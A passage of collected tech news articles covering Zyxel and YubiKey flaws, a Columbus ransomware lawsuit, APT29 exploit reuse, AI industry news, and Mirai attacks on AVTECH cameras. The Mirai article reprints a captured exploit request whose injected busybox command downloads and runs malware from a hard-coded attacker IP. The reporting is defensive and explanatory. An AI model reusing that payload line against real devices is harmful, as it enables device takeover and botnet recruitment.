Biz & IT


Zyxel warns of vulnerabilities in a wide range of its products

GET YER PATCHING ON —

Most serious vulnerabilities carry severity ratings of 9.8 and 8.1 out of a possible 10.


Getty Images

Networking hardware-maker Zyxel is warning of nearly a dozen vulnerabilities in a wide array of its products. If left unpatched, some of them could enable the complete takeover of the devices, which can be targeted as an initial point of entry into large networks.

The most serious vulnerability, tracked as CVE-2024-7261, can be exploited to “allow an unauthenticated attacker to execute OS commands by sending a crafted cookie to a vulnerable device,” Zyxel warned. The flaw, with a severity rating of 9.8 out of 10, stems from the “improper neutralization of special elements in the parameter ‘host’ in the CGI program” of vulnerable access points and security routers. Nearly 30 Zyxel devices are affected. As is the case with the remaining vulnerabilities in this post, Zyxel is urging customers to patch them as soon as possible.
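
Zyxel has not published the vulnerable code, so the sketch below is only a generic Python illustration of the bug class the advisory describes (OS command injection through an unsanitized parameter), not the company’s CGI program. The function and parameter names are invented for the example.

```python
# Generic illustration of OS command injection (the bug class behind CVE-2024-7261).
# This is NOT Zyxel's code; names and validation rules are hypothetical.
import re
import subprocess

def ping_host_unsafe(host: str) -> None:
    # Vulnerable pattern: a value like "example.com; reboot" appends a second command.
    subprocess.run(f"ping -c 1 {host}", shell=True)

def ping_host_safer(host: str) -> None:
    # Validate the value and pass it as a discrete argument, never through a shell.
    if not re.fullmatch(r"[A-Za-z0-9.\-]{1,253}", host):
        raise ValueError("invalid host value")
    subprocess.run(["ping", "-c", "1", host], check=False)
```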

But wait… there’s more

The hardware manufacturer warned of seven additional vulnerabilities affecting firewall series including the ATP, USG FLEX, and USG FLEX 50(W)/USG20(W)-VPN. The flaws carry severity ratings ranging from 4.9 to 8.1. They are:

CVE-2024-6343: A buffer overflow vulnerability in the CGI program that could allow an authenticated attacker with administrator privileges to wage denial-of-service attacks by sending crafted HTTP requests.

CVE-2024-7203: A post-authentication command injection vulnerability that could allow an authenticated attacker with administrator privileges to run OS commands by executing a crafted CLI command.

CVE-2024-42057: A command injection vulnerability in the IPSec VPN feature that could allow an unauthenticated attacker to run OS commands by sending a crafted username. The attack would be successful only if the device was configured in User-Based-PSK authentication mode and a valid user with a long username exceeding 28 characters exists.

CVE-2024-42058: A null pointer dereference vulnerability in some firewall versions that could allow an unauthenticated attacker to wage DoS attacks by sending crafted packets.

CVE-2024-42059: A post-authentication command injection vulnerability that could allow an authenticated attacker with administrator privileges to run OS commands on an affected device by uploading a crafted compressed language file via FTP.

CVE-2024-42060: A post-authentication command injection vulnerability that could allow an authenticated attacker with administrator privileges to execute OS commands by uploading a crafted internal user agreement file to the vulnerable device.

CVE-2024-42061: A reflected cross-site scripting vulnerability in the CGI program “dynamic_script.cgi” that could allow an attacker to trick a user into visiting a crafted URL with the XSS payload. The attacker could obtain browser-based information if the malicious script is executed on the victim’s browser.
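
For readers unfamiliar with the last item in the list, reflected XSS amounts to a web endpoint echoing attacker-controlled input back into a page without escaping it. The minimal Flask sketch below illustrates the pattern generically; it is not Zyxel’s “dynamic_script.cgi,” and the routes and parameter are invented for the example.

```python
# Generic reflected-XSS illustration (hypothetical routes, not Zyxel's CGI code).
from flask import Flask, request
from markupsafe import escape

app = Flask(__name__)

@app.route("/vulnerable")
def vulnerable():
    name = request.args.get("name", "")
    # Attacker-supplied markup such as <script>...</script> is reflected verbatim.
    return f"<p>Hello {name}</p>"

@app.route("/fixed")
def fixed():
    name = request.args.get("name", "")
    # Escaping neutralizes the special characters before they reach the browser.
    return f"<p>Hello {escape(name)}</p>"
```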

The remaining vulnerability is CVE-2024-5412 with a severity rating of 7.5. It resides in 50 Zyxel product models, including a range of customer premises equipment, fiber optical network terminals, and security routers. A buffer overflow vulnerability in the “libclinkc” library of affected devices could allow an unauthenticated attacker to wage denial-of-service attacks by sending a crafted HTTP request.

In recent years, vulnerabilities in Zyxel devices have regularly come under active attack. Many of the patches are available for download at links listed in the advisories. In a small number of cases, the patches are available through the cloud. Patches for some products are available only by privately contacting the company’s support team.



Oprah’s upcoming AI television special sparks outrage among tech critics

You get an AI, and You get an AI —

AI opponents say Gates, Altman, and others will guide Oprah through an AI “sales pitch.”

An ABC handout promotional image for “AI and the Future of Us: An Oprah Winfrey Special.”

On Thursday, ABC announced an upcoming TV special titled, “AI and the Future of Us: An Oprah Winfrey Special.” The one-hour show, set to air on September 12, aims to explore AI’s impact on daily life and will feature interviews with figures in the tech industry, like OpenAI CEO Sam Altman and Bill Gates. Soon after the announcement, some AI critics began questioning the guest list and the framing of the show in general.

“Sure is nice of Oprah to host this extended sales pitch for the generative AI industry at a moment when its fortunes are flagging and the AI bubble is threatening to burst,” tweeted author Brian Merchant, who frequently criticizes generative AI technology in op-eds, on social media, and through his “Blood in the Machine” AI newsletter.

“The way the experts who are not experts are presented as such 💀 what a train wreck,” replied artist Karla Ortiz, who is a plaintiff in a lawsuit against several AI companies. “There’s still PLENTY of time to get actual experts and have a better discussion on this because yikes.”

The trailer for Oprah’s upcoming TV special on AI.

On Friday, Ortiz created a lengthy viral thread on X that detailed her potential issues with the program, writing, “This event will be the first time many people will get info on Generative AI. However it is shaping up to be a misinformed marketing event starring vested interests (some who are under a litany of lawsuits) who ignore the harms GenAi inflicts on communities NOW.”

Critics of generative AI like Ortiz question the utility of the technology, its perceived environmental impact, and what they see as blatant copyright infringement. In training AI language models, tech companies like Meta, Anthropic, and OpenAI commonly use copyrighted material gathered without license or owner permission. OpenAI claims that the practice is “fair use.”

Oprah’s guests

According to ABC, the upcoming special will feature “some of the most important and powerful people in AI,” which appears to roughly translate to “famous and publicly visible people related to tech.” Microsoft co-founder Bill Gates, who stepped down as Microsoft CEO 24 years ago, will appear on the show to explore the “AI revolution coming in science, health, and education,” ABC says, and warn of “the once-in-a-century type of impact AI may have on the job market.”

As a guest representing ChatGPT-maker OpenAI, Sam Altman will explain “how AI works in layman’s terms” and discuss “the immense personal responsibility that must be borne by the executives of AI companies.” Karla Ortiz specifically criticized Altman in her thread by saying, “There are far more qualified individuals to speak on what GenAi models are than CEOs. Especially one CEO who recently said AI models will ‘solve all physics.’ That’s an absurd statement and not worthy of your audience.”

In a nod to present-day content creation, YouTube creator Marques Brownlee will appear on the show and reportedly walk Winfrey through “mind-blowing demonstrations of AI’s capabilities.”

Brownlee’s involvement received special attention from some critics online. “Marques Brownlee should be absolutely ashamed of himself,” tweeted PR consultant and frequent AI critic Ed Zitron, who regularly heaps scorn on generative AI in his own newsletter. “What a disgraceful thing to be associated with.”

Other guests include Tristan Harris and Aza Raskin from the Center for Humane Technology, who aim to highlight “emerging risks posed by powerful and superintelligent AI,” an existential risk topic that has its own critics. And FBI Director Christopher Wray will reveal “the terrifying ways criminals and foreign adversaries are using AI,” while author Marilynne Robinson will reflect on “AI’s threat to human values.”

Going only by the publicized guest list, it appears that Oprah does not plan to give voice to prominent non-doomer critics of AI. “This is really disappointing @Oprah and frankly a bit irresponsible to have a one-sided conversation on AI without informed counterarguments from those impacted,” tweeted TV producer Theo Priestley.

Others on the social media network shared similar criticism about a perceived lack of balance in the guest list, including Dr. Margaret Mitchell of Hugging Face. “It could be beneficial to have an AI Oprah follow-up discussion that responds to what happens in [the show] and unpacks generative AI in a more grounded way,” she said.

Oprah’s AI special will air on September 12 on ABC (and a day later on Hulu) in the US, and it will likely elicit further responses from the critics mentioned above. But perhaps that’s exactly how Oprah wants it: “It may fascinate you or scare you,” Winfrey said in a promotional video for the special. “Or, if you’re like me, it may do both. So let’s take a breath and find out more about it.”



Rust in Linux lead retires rather than deal with more “nontechnical nonsense”

Oxidation consternation —

How long can the C languages maintain their primacy in the kernel?

Rust never sleeps. But Rust, the programming language, can be held at bay if enough kernel programmers aren’t interested in seeing it implemented.

Getty Images

The Linux kernel is not a place to work if you’re not ready for some, shall we say, spirited argument. Still, one key developer in the project to expand Rust’s place inside the largely C-based kernel feels the “nontechnical nonsense” is too much, so he’s retiring.

Wedson Almeida Filho, a leader in the Rust for Linux project, wrote to the Linux kernel mailing list last week to remove himself as the project’s maintainer. “After almost 4 years, I find myself lacking the energy and enthusiasm I once had to respond to some of the nontechnical nonsense, so it’s best to leave it up to those who still have it in them,” Filho wrote. While thanking his teammates, he noted that he believed the future of kernels “is with memory-safe languages,” such as Rust. “I am no visionary but if Linux doesn’t internalize this, I’m afraid some other kernel will do to it what it did to Unix,” Filho wrote.

Filho also left a “sample for context,” a link to a moment during a Linux conference talk in which an off-camera voice, identified by Filho in a Register interview as kernel maintainer Ted Ts’o, emphatically interjects: “Here’s the thing: you’re not going to force all of us to learn Rust.” In the context of Filho’s request that Linux’s file system implement Rust bindings, Ts’o says that while he knows he must fix all the C code for any change he makes, he cannot or will not fix the Rust bindings that may be affected.

“They just want to keep their C code”

Asahi Lina, a developer on the Asahi Linux project, posted on Mastodon late last week: “I regretfully completely understand Wedson’s frustrations.” Noting that “a subset of C kernel developers just seem determined to make the lives of Rust maintainers as difficult as possible,” Lina detailed the memory safety issues she ran into writing Direct Rendering Manager (DRM) scheduler abstractions. Lina tried to push small fixes that would make the C code “more robust and the lifetime requirements sensible,” but was blocked by the maintainer. Bugs in that DRM scheduler’s C code are the only causes of kernel panics in Lina’s Apple GPU driver, she wrote—“Because I wrote it in Rust.”

“But I get the feeling that some Linux kernel maintainers just don’t care about future code quality, or about stability or security any more,” Lina wrote. “They just want to keep their C code and wish us Rust folks would go away. And that’s really sad… and isn’t helping make Linux better.”

Drew DeVault, founder of SourceHut, blogged about Rust’s attempts to find a place inside the kernel. In theory, the kernel should welcome enthusiastic input from motivated newcomers. “In practice, the Linux community is the wild wild west, and sweeping changes are infamously difficult to achieve consensus on, and this is by far the broadest sweeping change ever proposed for the project,” DeVault writes. “Every subsystem is a private fiefdom, subject to the whims of each one of Linux’s 1,700+ maintainers, almost all of whom have a dog in this race. It’s herding cats: introducing Rust effectively is one part coding work and ninety-nine parts political work – and it’s a lot of coding work.”

Rather than test their patience with the kernel’s politics, DeVault suggests Rust developers build a Linux-compatible kernel from scratch. “Freeing yourselves of the [Linux Kernel Mailing List] political battles would probably be a big win for the ambitions of bringing Rust into kernel space,” DeVault writes.

Torvalds understands why Rust uptake is slow

You might be wondering what lead maintainer Linus Torvalds thinks about all this. He took a “wait and see” approach in 2021, hoping Rust would first make itself known in relatively isolated device drivers. At an appearance late last month, Torvalds… essentially agreed with the Rust-minded developer complaints, albeit from a much greater remove.

“I was expecting [Rust] updates to be faster, but part of the problem is that old-time kernel developers are used to C and don’t know Rust,” Torvalds said. “They’re not exactly excited about having to learn a new language that is, in some respects, very different. So there’s been some pushback on Rust.” Torvalds added, however, that “another reason has been the Rust infrastructure itself has not been super stable.”

The Linux kernel is a high-stakes project with hundreds, if not thousands, of contributors, so conflict is perhaps inevitable. Time will tell how long C will remain the primary way of coding for, and thinking about, such a large yet always-moving codebase.

Ars has reached out to both Filho and Ts’o for comment and will update this post with any responses.



YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel

ATTACK OF THE CLONES —

Sophisticated attack breaks security assurances of the most popular FIDO key.


Yubico

The YubiKey 5, the most widely used hardware token for two-factor authentication based on the FIDO standard, contains a cryptographic flaw that makes the finger-size device vulnerable to cloning when an attacker gains brief physical access to it, researchers said Tuesday.

The cryptographic flaw, known as a side channel, resides in a small microcontroller used in a large number of other authentication devices, including smartcards used in banking, electronic passports, and access to secure areas. While the researchers have confirmed all YubiKey 5 series models can be cloned, they haven’t tested other devices that use the same microcontroller, Infineon’s SLE78, or its successor microcontrollers, the Infineon Optiga Trust M and the Infineon Optiga TPM. The researchers suspect that any device using any of these three microcontrollers and the Infineon cryptographic library contains the same vulnerability.

Patching not possible

YubiKey-maker Yubico issued an advisory in coordination with a detailed disclosure report from NinjaLab, the security firm that reverse-engineered the YubiKey 5 series and devised the cloning attack. All YubiKeys running firmware prior to version 5.7—which was released in May and replaces the Infineon cryptolibrary with a custom one—are vulnerable. Updating key firmware on the YubiKey isn’t possible. That leaves all affected YubiKeys permanently vulnerable.

“An attacker could exploit this issue as part of a sophisticated and targeted attack to recover affected private keys,” the advisory confirmed. “The attacker would need physical possession of the YubiKey, Security Key, or YubiHSM, knowledge of the accounts they want to target and specialized equipment to perform the necessary attack. Depending on the use case, the attacker may also require additional knowledge including username, PIN, account password, or authentication key.”

Side channels are clues left in physical manifestations, such as electromagnetic emanations, data caches, or the time required to complete a task, that can leak cryptographic secrets. In this case, the side channel is the amount of time taken during a mathematical calculation known as a modular inversion. The Infineon cryptolibrary failed to implement a common side-channel defense known as constant time when performing modular inversion operations involving the Elliptic Curve Digital Signature Algorithm. Constant time ensures that the time a sensitive cryptographic operation takes to execute is uniform rather than varying with the specific key being processed.

More precisely, the side channel is located in the Infineon implementation of the Extended Euclidean Algorithm, a method for, among other things, computing the modular inverse. By using an oscilloscope to measure the electromagnetic radiation while the token is authenticating itself, the researchers can detect tiny execution time differences that reveal a token’s ephemeral ECDSA key, also known as a nonce. Further analysis allows the researchers to extract the secret ECDSA key that underpins the entire security of the token.
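
Neither Yubico nor Infineon has published the affected code, but the reason a textbook implementation of the extended Euclidean algorithm is not constant time is easy to demonstrate. The Python sketch below is a minimal illustration, not NinjaLab’s attack: it computes a modular inverse the naive way and counts loop iterations, and that count, and therefore the running time, varies with the secret nonce, which is exactly the input-dependent behavior a constant-time implementation is designed to eliminate.

```python
# Minimal illustration (not NinjaLab's attack code): a textbook extended
# Euclidean algorithm whose iteration count, and thus run time, depends on
# the secret input k. Constant-time implementations avoid exactly this.

def modinv_with_steps(k: int, n: int) -> tuple[int, int]:
    """Return (k^-1 mod n, number of EEA loop iterations)."""
    old_r, r = k, n
    old_s, s = 1, 0
    steps = 0
    while r != 0:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
        steps += 1
    assert old_r == 1, "k must be invertible mod n"
    return old_s % n, steps

# Group order of the NIST P-256 curve used by ECDSA.
N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551

for k in (3, 0x1B8E5C331D7A42F9, N - 2):
    inv, steps = modinv_with_steps(k, N)
    assert (inv * k) % N == 1
    print(f"{k.bit_length():3d}-bit nonce -> {steps} EEA iterations")
```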

In Tuesday’s report, NinjaLab co-founder Thomas Roche wrote:

In the present work, NinjaLab unveils a new side-channel vulnerability in the ECDSA implementation of Infineon on any security microcontroller family of the manufacturer. This vulnerability lies in the ECDSA ephemeral key (or nonce) modular inversion, and, more precisely, in the Infineon implementation of the Extended Euclidean Algorithm (EEA for short). To our knowledge, this is the first time an implementation of the EEA is shown to be vulnerable to side-channel analysis (contrarily to the EEA binary version). The exploitation of this vulnerability is demonstrated through realistic experiments and we show that an adversary only needs to have access to the device for a few minutes. The offline phase took us about 24 hours; with more engineering work in the attack development, it would take less than one hour.

After a long phase of understanding Infineon implementation through side-channel analysis on a Feitian open JavaCard smartcard, the attack is tested on a YubiKey 5Ci, a FIDO hardware token from Yubico. All YubiKey 5 Series (before the firmware update 5.7 of May 6th, 2024) are affected by the attack. In fact all products relying on the ECDSA of Infineon cryptographic library running on an Infineon security microcontroller are affected by the attack. We estimate that the vulnerability exists for more than 14 years in Infineon top secure chips. These chips and the vulnerable part of the cryptographic library went through about 80 CC certification evaluations of level AVA VAN 4 (for TPMs) or AVA VAN 5 (for the others) from 2010 to 2024 (and a bit less than 30 certificate maintenances).



City of Columbus sues man after he discloses severity of ransomware attack

WHISTLEBLOWER IN LEGAL CROSSHAIRS —

Mayor said data was unusable to criminals; researcher proved otherwise.

A ransom note is plastered across a laptop monitor.

A judge in Ohio has issued a temporary restraining order against a security researcher who presented evidence that a recent ransomware attack on the city of Columbus scooped up reams of sensitive personal information, contradicting claims made by city officials.

The order, issued by a judge in Ohio’s Franklin County, came after the city of Columbus fell victim to a ransomware attack on July 18 that siphoned 6.5 terabytes of the city’s data. A ransomware group known as Rhysida took credit for the attack and offered to auction off the data with a starting bid of about $1.7 million in bitcoin. On August 8, after the auction failed to find a bidder, Rhysida released what it said was about 45 percent of the stolen data on the group’s dark web site, which is accessible to anyone with a Tor browser.

Dark web not readily available to public—really?

Columbus Mayor Andrew Ginther said on August 13 that a “breakthrough” in the city’s forensic investigation of the breach found that the sensitive files Rhysida obtained were either encrypted or corrupted, making them “unusable” to the thieves. Ginther went on to say the data’s lack of integrity was likely the reason the ransomware group had been unable to auction off the data.

Shortly after Ginther made his remarks, security researcher David Leroy Ross contacted local news outlets and presented evidence that showed the data Rhysida published was fully intact and contained highly sensitive information regarding city employees and residents. Ross, who uses the alias Connor Goodwolf, presented screenshots and other data that showed the files Rhysida had posted included names from domestic violence cases and Social Security numbers for police officers and crime victims. Some of the data spanned years.

On Thursday, the city of Columbus sued Ross for alleged damages for criminal acts, invasion of privacy, negligence, and civil conversion. The lawsuit claimed that downloading documents from a dark web site run by ransomware attackers amounted to him “interacting” with them and required special expertise and tools. The suit went on to challenge Ross’s decision to alert reporters to the information, which it claimed would not otherwise be easily obtained.

“Only individuals willing to navigate and interact with the criminal element on the dark web, who also have the computer expertise and tools necessary to download data from the dark web, would be able to do so,” city attorneys wrote. “The dark web-posted data is not readily available for public consumption. Defendant is making it so.”

The same day, a Franklin County judge granted the city’s motion for a temporary restraining order against Ross. It bars the researcher “from accessing, and/or downloading, and/or disseminating” any city files that were posted to the dark web. The motion was made and granted “ex parte,” meaning in secret before Ross was informed of it or had an opportunity to present his case.

In a press conference Thursday, Columbus City Attorney Zach Klein defended his decision to sue Ross and obtain the restraining order.

“This is not about freedom of speech or whistleblowing,” he said. “This is about the downloading and disclosure of stolen criminal investigatory records. This effort is to get [Ross] to stop downloading and disclosing stolen criminal records to protect public safety.”

The Columbus city attorney’s office didn’t respond to questions sent by email. It did provide the following statement:

The lawsuit filed by the City of Columbus pertains to stolen data that Mr. Ross downloaded from the dark web to his own, local device and disseminated to the media. In fact, several outlets used the stolen data provided by Ross to go door-to-door and contact individuals using names and addresses contained within the stolen data. As has now been extensively reported, Mr. Ross also showed multiple news outlets stolen, confidential data belonging to the City which he claims reveal the identities of undercover police officers and crime victims as well as evidence from active criminal investigations. Sharing this stolen data threatens public safety and the integrity of the investigations. The temporary restraining order granted by the Court prohibits Mr. Ross from disseminating any of the City’s stolen data. Mr. Ross is still free to speak about the cyber incident and even describe what kind of data is on the dark web—he just cannot disseminate that data.

Attempts to reach Ross for comment were unsuccessful. Email sent to the Columbus mayor’s office went unanswered.

A screenshot showing the Rhysida dark web site.

As shown above in the screenshot of the Rhysida dark web site on Friday morning, the sensitive data remains available to anyone who looks for it. Friday’s order may bar Ross from accessing the data or disseminating it to reporters, but it has no effect on those who plan to use the data for malicious purposes.



ChatGPT hits 200 million active weekly users, but how many will admit using it?

Your secret friend —

Despite corporate prohibitions on AI use, people flock to the chatbot in record numbers.

The OpenAI logo emerging from broken jail bars, on a purple background.

On Thursday, OpenAI said that ChatGPT has attracted over 200 million weekly active users, according to a report from Axios, doubling the AI assistant’s user base since November 2023. The company also revealed that 92 percent of Fortune 500 companies are now using its products, highlighting the growing adoption of generative AI tools in the corporate world.

The rapid growth in user numbers for ChatGPT (which is not a new phenomenon for OpenAI) suggests growing interest in—and perhaps reliance on—the AI-powered tool, despite frequent skepticism from some critics of the tech industry.

“Generative AI is a product with no mass-market utility—at least on the scale of truly revolutionary movements like the original cloud computing and smartphone booms,” PR consultant and vocal OpenAI critic Ed Zitron blogged in July. “And it’s one that costs an eye-watering amount to build and run.”

Despite this kind of skepticism (which raises legitimate questions about OpenAI’s long-term viability), OpenAI claims that people are using ChatGPT and OpenAI’s services in record numbers. One reason for the apparent dissonance is that ChatGPT users might not readily admit to using it due to organizational prohibitions against generative AI.

Wharton professor Ethan Mollick, who commonly explores novel applications of generative AI on social media, tweeted Thursday about this issue. “Big issue in organizations: They have put together elaborate rules for AI use focused on negative use cases,” he wrote. “As a result, employees are too scared to talk about how they use AI, or to use corporate LLMs. They just become secret cyborgs, using their own AI & not sharing knowledge”

The new prohibition era

It’s difficult to get hard numbers showing the number of companies with AI prohibitions in place, but a Cisco study released in January claimed that 27 percent of organizations in their study had banned generative AI use. Last August, ZDNet reported on a BlackBerry study that said 75 percent of businesses worldwide were “implementing or considering” plans to ban ChatGPT and other AI apps.

As an example, Ars Technica’s parent company Condé Nast maintains a no-AI policy related to creating public-facing content with generative AI tools.

Prohibitions aren’t the only issue complicating public admission of generative AI use. Social stigmas have been developing around generative AI technology that stem from job loss anxiety, potential environmental impact, privacy issues, IP and ethical issues, security concerns, fear of a repeat of cryptocurrency-like grifts, and a general wariness of Big Tech that some claim has been steadily rising over recent years.

Whether the current stigmas around generative AI use will break down over time remains to be seen, but for now, OpenAI’s management is taking a victory lap. “People are using our tools now as a part of their daily lives, making a real difference in areas like healthcare and education,” OpenAI CEO Sam Altman told Axios in a statement, “whether it’s helping with routine tasks, solving hard problems, or unlocking creativity.”

Not the only game in town

OpenAI also told Axios that usage of its AI language model APIs has doubled since the release of GPT-4o mini in July. This suggests software developers are increasingly integrating OpenAI’s large language model (LLM) tech into their apps.
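
As a rough illustration of what that kind of integration looks like in practice, here is a minimal sketch using OpenAI’s official Python SDK. The model name and prompt are placeholders, it assumes an OPENAI_API_KEY environment variable is set, and it is not code from any particular product.

```python
# Minimal sketch of an API integration using the official openai Python SDK (v1.x).
# Assumes OPENAI_API_KEY is set in the environment; the prompt is a placeholder.
from openai import OpenAI

client = OpenAI()  # picks up OPENAI_API_KEY automatically

response = client.chat.completions.create(
    model="gpt-4o-mini",
    messages=[
        {"role": "system", "content": "You are a concise assistant."},
        {"role": "user", "content": "Summarize this support ticket in one sentence: ..."},
    ],
)
print(response.choices[0].message.content)
```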

And OpenAI is not alone in the field. Companies like Microsoft (with Copilot, based on OpenAI’s technology), Google (with Gemini), Meta (with Llama), and Anthropic (Claude) are all vying for market share, frequently updating their APIs and consumer-facing AI assistants to attract new users.

If the generative AI space is a market bubble primed to pop, as some have claimed, it is a very big and expensive one that is apparently still growing larger by the day.



Commercial spyware vendor exploits used by Kremlin-backed hackers, Google says

MERCHANTS OF HACKING —

Findings undercut pledges by NSO Group and Intellexa that their wares won’t be abused.


Getty Images

Critics of spyware and exploit sellers have long warned that the advanced hacking tools sold by commercial surveillance vendors (CSVs) represent a worldwide danger because they inevitably find their way into the hands of malicious parties, even when the CSVs promise they will be used only to target known criminals. On Thursday, Google analysts presented evidence bolstering the critique after finding that spies working on behalf of the Kremlin used exploits that are “identical or strikingly similar” to those sold by spyware makers Intellexa and NSO Group.

The hacking outfit, tracked under names including APT29, Cozy Bear, and Midnight Blizzard, is widely assessed to work on behalf of Russia’s Foreign Intelligence Service, or the SVR. Researchers with Google’s Threat Analysis Group, which tracks nation-state hacking, said Thursday that they observed APT29 using exploits identical or strikingly similar to those first used by commercial exploit sellers NSO Group of Israel and Intellexa of Ireland. In both cases, the commercial surveillance vendors’ exploits were first used as zero-days, meaning when the vulnerabilities weren’t publicly known and no patch was available.

Identical or strikingly similar

Once patches became available for the vulnerabilities, TAG said, APT29 used the exploits in watering hole attacks, which infect targets by surreptitiously planting exploits on sites they’re known to frequent. TAG said APT29 used the exploits as n-days, which target vulnerabilities that have recently been fixed but whose patches have not yet been widely installed by users.

“In each iteration of the watering hole campaigns, the attackers used exploits that were identical or strikingly similar to exploits from CSVs, Intellexa, and NSO Group,” TAG’s Clement Lecigne wrote. “We do not know how the attackers acquired these exploits. What is clear is that APT actors are using n-day exploits that were originally used as 0-days by CSVs.”

In one case, Lecigne said, TAG observed APT29 compromising the Mongolian government sites mfa.gov[.]mn and cabinet.gov[.]mn and planting a link that loaded code exploiting CVE-2023-41993, a critical flaw in the WebKit browser engine. The Russian operatives used the vulnerability, loaded onto the sites in November, to steal browser cookies for accessing online accounts of targets they hoped to compromise. The Google analyst said that the APT29 exploit “used the exact same trigger” as an exploit Intellexa used in September 2023, before CVE-2023-41993 had been fixed.

Lecigne provided the following image showing a side-by-side comparison of the code used in each attack.

A side-by-side comparison of code used by APT29 in November 2023 and Intellexa in September of that year.

Google TAG

APT29 used the same exploit again in February of this year in a watering hole attack on the Mongolian government website mga.gov[.]mn.

In July 2024, APT29 planted a new cookie-stealing attack on mga.gov[.]mn. It exploited CVE-2024-5274 and CVE-2024-4671, two n-day vulnerabilities in Google Chrome. Lecigne said APT29’s CVE-2024-5274 exploit was a slightly modified version of one NSO Group used in May 2024, when it was still a zero-day. The exploit for CVE-2024-4671, meanwhile, contained many similarities to an exploit for CVE-2021-37973 that Intellexa had previously used to evade Chrome sandbox protections.

The timeline of the attacks is illustrated below:

Google TAG

As noted earlier, it’s unclear how APT29 would have obtained the exploits. Possibilities include: malicious insiders at the CSVs or brokers who worked with the CSVs, hacks that stole the code, or outright purchases. Both companies defend their business by promising to sell exploits only to governments of countries deemed to have good world standing. The evidence unearthed by TAG suggests that despite those assurances, the exploits are finding their way into the hands of government-backed hacking groups.

“While we are uncertain how suspected APT29 actors acquired these exploits, our research underscores the extent to which exploits first developed by the commercial surveillance industry are proliferated to dangerous threat actors,” Lecigne wrote.



Unpatchable 0-day in surveillance cam is being exploited to install Mirai

MIRAI STRIKES AGAIN —

Vulnerability is easy to exploit and allows attackers to remotely execute commands.

The word ZERO-DAY is hidden amidst a screen filled with ones and zeroes.

Malicious hackers are exploiting a critical vulnerability in a widely used security camera to spread Mirai, a family of malware that wrangles infected Internet of Things devices into large networks for use in attacks that take down websites and other Internet-connected devices.

The attacks target the AVM1203, a surveillance device from Taiwan-based manufacturer AVTECH, network security provider Akamai said Wednesday. Unknown attackers have been exploiting a 5-year-old vulnerability since March. The zero-day vulnerability, tracked as CVE-2024-7029, is easy to exploit and allows attackers to execute malicious code. The AVM1203 is no longer sold or supported, so no update is available to fix the critical zero-day.

That time a ragtag army shook the Internet

Akamai said that the attackers are exploiting the vulnerability so they can install a variant of Mirai, which arrived in September 2016 when a botnet of infected devices took down cybersecurity news site Krebs on Security. Mirai contained functionality that allowed a ragtag army of compromised webcams, routers, and other types of IoT devices to wage distributed denial-of-service attacks of record-setting sizes. In the weeks that followed, the Mirai botnet delivered similar attacks on Internet service providers and other targets. One such attack, against dynamic domain name provider Dyn, paralyzed vast swaths of the Internet.

Complicating attempts to contain Mirai, its creators released the malware to the public, a move that allowed virtually anyone to create their own botnets that delivered DDoSes of once-unimaginable size.

Kyle Lefton, a security researcher with Akamai’s Security Intelligence and Response Team, said in an email that the team has observed the threat actor behind the attacks performing DDoS attacks against “various organizations,” which he didn’t name or describe further. So far, the team hasn’t seen any indication the threat actors are monitoring video feeds or using the infected cameras for other purposes.

Akamai detected the activity using a “honeypot” of devices that mimic the cameras on the open Internet to observe any attacks that target them. The technique doesn’t allow the researchers to measure the botnet’s size. The US Cybersecurity and Infrastructure Security Agency warned of the vulnerability earlier this month.

The technique, however, has allowed Akamai to capture the code used to compromise the devices. It targets a vulnerability that has been known since at least 2019, when exploit code became public. The zero-day resides in the “brightness argument in the ‘action=’ parameter” and allows for command injection, researchers wrote. The zero-day, discovered by Akamai researcher Aline Eliovich, wasn’t formally recognized until this month, with the publication of CVE-2024-7029.

Wednesday’s post went on to say:

How does it work?

This vulnerability was originally discovered by examining our honeypot logs. Figure 1 shows the decoded URL for clarity.

Fig. 1: Decoded payload body of the exploit attempts

Akamai

The vulnerability lies in the brightness function within the file /cgi-bin/supervisor/Factory.cgi (Figure 2).

Fig. 2: PoC of the exploit

Akamai

What could happen?

In the exploit examples we observed, essentially what happened is this: The exploit of this vulnerability allows an attacker to execute remote code on a target system.

Figure 3 is an example of a threat actor exploiting this flaw to download and run a JavaScript file to fetch and load their main malware payload. Similar to many other botnets, this one is also spreading a variant of Mirai malware to its targets.

Fig. 3: Strings from the JavaScript downloader

Akamai

In this instance, the botnet is likely using the Corona Mirai variant, which has been referenced by other vendors as early as 2020 in relation to the COVID-19 virus.

Upon execution, the malware connects to a large number of hosts through Telnet on ports 23, 2323, and 37215. It also prints the string “Corona” to the console on an infected host (Figure 4).

Fig. 4: Execution of malware showing output to console

Akamai

Static analysis of the strings in the malware samples shows targeting of the path /ctrlt/DeviceUpgrade_1 in an attempt to exploit Huawei devices affected by CVE-2017-17215. The samples have two hard-coded command and control IP addresses, one of which is part of the CVE-2017-17215 exploit code:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"

$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)

The botnet also targeted several other vulnerabilities including a Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. We have observed these vulnerabilities exploited in the wild several times, and they continue to be successful.

Given that this camera model is no longer supported, the best course of action for anyone using one is to replace it. As with all Internet-connected devices, IoT devices should never be accessible using the default credentials that shipped with them.



A long, weird FOSS circle ends as Microsoft donates Mono to Wine project

Thank you for your service (calls) —

Mono had many homes over 23 years, but Wine’s repos might be its final stop.

Does Mono fit between the Chilean cab sav and Argentinian malbec, or is it more of an orange, maybe?

Getty Images

Microsoft has donated the Mono Project, an open-source framework that brought its .NET platform to non-Windows systems, to the Wine community. WineHQ will be the steward of the Mono Project upstream code, while Microsoft will encourage Mono-based apps to migrate to its open source .NET framework.

As Microsoft notes on the Mono Project homepage, the last major release of Mono was in July 2019. Mono was “a trailblazer for the .NET platform across many operating systems” and was the first implementation of .NET on Android, iOS, Linux, and other operating systems.

Ximian, Novell, SUSE, Xamarin, Microsoft—now Wine

